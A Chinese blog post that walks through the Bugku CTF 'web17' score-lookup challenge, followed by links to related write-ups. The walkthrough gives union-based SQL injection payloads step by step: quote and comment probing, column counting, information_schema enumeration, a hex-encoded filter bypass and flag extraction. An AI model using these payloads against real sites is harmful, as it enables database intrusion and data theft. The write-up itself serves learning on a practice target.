bugku web17 wp

最新推荐文章于 2022-08-20 09:29:58 发布
最新推荐文章于 2022-08-20 09:29:58 发布
阅读量119 收藏
点赞数
分类专栏: 笔记 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55185160/article/details/117623341
版权


最近在学习数据分析,学习了一些sql语言,激起了我对sql注入的学习,于是我刷了bugku 成绩查询这个题 下面记录下我学习的过程吧。
打开题目是一个输入框于是我想可能与sql注入有关,我查看网页源码


发现要用post的方式传参于是打开hackbar进行传参,看到name=id,placeholder = l ,2,3意思是传参name为id placeholder是输入用户名为1,2,3,…于是我传参id=1试试


结果有回显,成功查到了成绩单,然后换1,2,3…试试,发现有回显,


发现有4列表(名字,math,English,Chinese)再判断是字符型注入还是数值型注入:id=1成功查询,id=1’查询失败,id=1'#查询成功,所以该注入类型为字符型注入简单说明一下为仆么:如果是数伯型注人: W here id = l 成功 W here id=1’失败 Where id =1’ f 还是会失败如果是字符型注人: where id =‘1’成功 Where id =‘1’‘失败 where id =‘1’#’成功因为#会注释掉后面的字符就相当于 where id =‘1这里还可以参考《union注入之字符型注入和数值型注入》,  https://blog.csdn.net/ws1813004226/article/details/116599138?utm_source=app&app_version=4.8.0&code=app_1562916241&uLinkId=usr1mkqgl919blen 以学习字符型注入和数值型注入
输入 I order by4#返回正常,输入1 order by 5/返回异常,看来的确是4列。为什么要判断字符段的个数呢,因为 union 查询需要前后学符段数一致。接下来就开始暴库名、表名、字段名
首先爆库名:通过 id =11 ' union select 1,2,3, database ()#得到数据库名字 skctf _ flag

然后再查询表名:
d=11' union select 1,2,3,table_name from information_schema.tables where table_schema=‘skctf’ #
接下来是暴字段通过 id =- I ' union select 1,2,3, group _ concat ( column _ name ) from information _ schema . columns where table _name=0x666c3467#//这里需要用16进制绕过


最后就是查询数据了,通过使用:id=-1' union select 1,2,3,skctf_flag from fl4g#


这样flag就拿到了

Bri9ht_pe@r1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
BugkuCTF-web17
weixin_46396711的博客
04-19 164
原题链接 判断是否存在SQL注入 首先通过简单的输入判断请求方式为post方式,接着f12打开hackbar插件判断是否存在SQL注入(也可直接在题目输入框输入) 先输入id=1 再输入id=1‘由此可判断存在SQL注入,且判断SQL语句中存在引号,此处引号的作用即为闭合前引号 通过order by语句判断字段数,#作用是注释后面的引号所以可判断共有四列 information_schema结构 用来存储数据库系统信息 schemata存储数据库名 tables存储表名 columns存
bugku web部分 wp
qq_49354488的博客
10-24 908
文章目录MD5解密输入长度限制绕过第一个if判断正则匹配数组绕过堆叠注入暴力破解暴力破解验证码绕过绕过前端验证暴力破解BugkuCTFWEB 2计算器web基础$_GETweb基础$_POST矛盾WEB 3域名解析你必须让他停下本地包含变量1web 5头等舱网站被黑管理员系统WEB 4flag在index里输入密码查看flag点击一百万次备份是个好习惯成绩单秋名山老司机速度要快Cookie欺骗never give upwelcome to bugkuctf过狗一句话字符?正则?前女友(SKCTF)login
bugku webwp
weixin_43404488的博客
12-01 426
** web 2 你必须让他停下 ** 打开网页,扑面而来的滑稽表情, web第一步,先看源代码 意外结果,源码中获得flag; 计算器 随机码计算器,难道这么简单?输入答案试一下 179 尴尬了,实际发现,只能输入1位, 想到可能作者在源码中做了手脚,限制了长度 看一下源码; 果然,在源码中发现,输入的最大格式被限制为 1; 改一下; 改成我们想要的 再输入试一下 web基础$_...
Bugku web21 WP
u011250160的博客
06-04 82
最主要部分,源码审计 "if(!$_GET['id']) //如果无法通过get获得id变量 { header('Location: hello.php?id=1');//跳转到hello.php文件设置id=1 exit(); //退出脚本。 } $id=$_GET['id']; //通过get方式获得其他文件的id变量 $a=$_GET['a']; //通过get方式获得其他文件的a变量 $b=$_GET['b']; //通过get方式获得其他文件的b变量 if(stripos($
Bugku文件包含WP
最新发布
wlw_xx的博客
08-20 1021
Bugku文件包含WP
bugku web题 33-40 wp
h0ryit的博客
06-03 1688
md5 collision 要求input a,题目提示很清楚了。 利用php的特性: PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 0e开头的MD5汇总 payload:?a=s878926199a ...
bugku题目的wp
zbbjya的博客
04-01 369
web 源代码 打开我输入的是 127.0.0.1 输入之后发现没有用 然后查看源代码我们会发现有些不一样的东西 有这个var1和var2 并且后面有eval(unescape(p1) + unescape(’%35%34%61%61%32’ + p2)); eval 是执行语句说明可能需要这样构造将可执行的语句获取出来 我们仔细看一下这个编码是url编码直接在hackbar里面就可以解 根据提示将其组合起来然后解密 %66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%5
bugku web wp
Wei_xino的博客
10-12 412
写在前面: 简单步骤不再复现,只是再复习一下知识点,可以挖深一点。 web2 F12 计算器 F12改html $get $post ? & hackbar 矛盾 很多解法 1加一个符号就行了 web3 F12,发现一串密文,Unicode解码 域名解析 我们百度这个是什么意思 是把域名解析到一个IP地址,然后在此IP地址的主机上将一个子目录与域名绑定。 互联网中的地址是数字的IP地址,...
BugKu Web篇通关wp
python_LC_nohtyp的博客
09-08 568
BugKu Web篇通关wp 文章目录BugKu Web篇通关wp0x01 WEB20x02 计算器0x03 web基础$_GET0x04 web基础$_POST0x04 矛盾0x05 WEB3 0x01 WEB2 没啥好说的直接F12打开控制台,找到Flag 过! 0x02 计算器 需要计算64+65的结果,F12打开控制台,发现 修改为10,就可以输入了,得到flag过! 0x03 web基础$_GET 简单的get传参,直接通过url传参即可 0x04 web基础$_POST 类似get的操
实验吧WEB题目WP
08-10
这是自己做的一个实验吧的十七到题目的WP,其中也有别人的WP
bugku杂项题writeup
11-22
bugku杂项题writeup
wpWeb服务编程案例
04-03
在Windows Phone(简称WP)平台上,开发者可以利用Web服务编程技术来创建强大的应用程序,与远程服务器进行数据交换,实现丰富的功能。本案例旨在探讨如何在Windows Phone设备上开发Web服务应用,通过集成Web服务,...
affinewp
m0_55185160的博客
06-15 6364
题目: d87 x65 x6c x63 o157 d109 o145 b100000 d116 b1101111 o40 x6b b1100101 b1101100 o141 d105 x62 d101 b1101001 d46 o40 d71 x69 d118 x65 x20 b1111001 o157 b1110101 d32 o141 d32 d102 o154 x61 x67 b100000 o141 d115 b100000 b1100001 d32 x67 o151 x66 d116 b101
[GXYCTF2019]BabyUpload wp
m0_55185160的博客
03-21 5424
打开题目是一个普通的文件上传,首先上传一个普通的一句话木马得到 发现后缀名过滤了ph,所以我们上传一个图片马 上传类型也受限制了,所以把数据类型改为image/ipeg 诶这里说明它检测的是文本的内容, ...
[GWCTF 2019]我有一个数据库 wp
m0_55185160的博客
04-23 4366
得到了/phpmyadmin/路径,加上题目是我有一个数据库,于是想到应该本题就是和phpmyadmin数据库有关 我们可以看到phpmyadmin的版本为4.8.1,搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613,下面我们复现一下漏洞。 首先分析一下源码: index.php 关于target的部分 $target_blacklist = array ( 'imp..
[0CTF 2016]piapiapia WP
m0_55185160的博客
03-31 3882
打开题目发现是一个登录注册页面,然后利用sql注入的方法进行测试结果没有反应,于是使用dirsearch去扫一下网站看看有没有什么东西,扫到了register.php和www.zip,看到有网站源码就会顺利很多了 下载下源码来分析一下, register.php 这是注册页面的php代码,只是限制了username和password的长度和是否存在。 注册登录成功以后跳转到了update.php 分析一下update.php的代码 可以通过post方式上传phone...
WP7程序开发入门指南
此外,还会涉及到数据存储,包括Isolated Storage,以及如何通过Web服务(如XML或JSON)进行远程数据访问。 网络通信在WP7应用中也扮演着重要角色,书中的内容可能包括使用HTTP请求进行数据交换,以及集成社交媒体...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值